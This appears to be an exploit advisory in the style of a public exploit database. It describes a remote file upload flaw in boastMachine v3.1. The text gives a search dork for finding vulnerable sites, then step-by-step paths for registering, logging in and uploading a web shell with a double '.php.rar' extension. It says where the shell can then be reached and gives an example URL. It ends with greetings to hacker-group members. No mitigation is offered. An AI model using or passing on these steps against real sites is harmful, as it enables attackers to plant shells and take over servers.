27 lines
No EOL
1.2 KiB
Text
27 lines
No EOL
1.2 KiB
Text
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|
Exploit Title : boastMachine v3.1 Remote File Upload Vulnerability
|
|
Author: alnjm33
|
|
Software Link: http://boastology.com/pages/dload.php?id=bmachine-3.1.zip
|
|
Software Link2:http://boastology.com/pages/dload.php?id=bmachine-3.1.rar
|
|
Version: 3.1
|
|
Tested on: Version 3.1
|
|
My home : Sec-war.com<http://Sec-war.com>
|
|
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|
==========================================Dork==========================================
|
|
( Powered by boastMachine v3.1 )
|
|
================================Exploit=============================================
|
|
First join in the Site
|
|
/Server/path/register.php
|
|
After that
|
|
login in the Site
|
|
/Server/path/login.php
|
|
After Login
|
|
go to this link
|
|
/Server/path/bmc/files.php?form_id=new
|
|
Now upload your shell like ( Shell.php.rar )
|
|
Now you can find your shell here
|
|
/Server/path/files/username_Shell.php.rar
|
|
e.g
|
|
http://server/hp_boastMachine/files/alnjm33_aasaa.php.rar
|
|
=======================================================================================
|
|
Greetz to :PrEdAtOr -Sh0ot3R - xXx - Mu$L!m-h4ck3r - ahmadso - JaMbA - RoOt_EgY- jago-dz - XR57 all Sec-War.com members |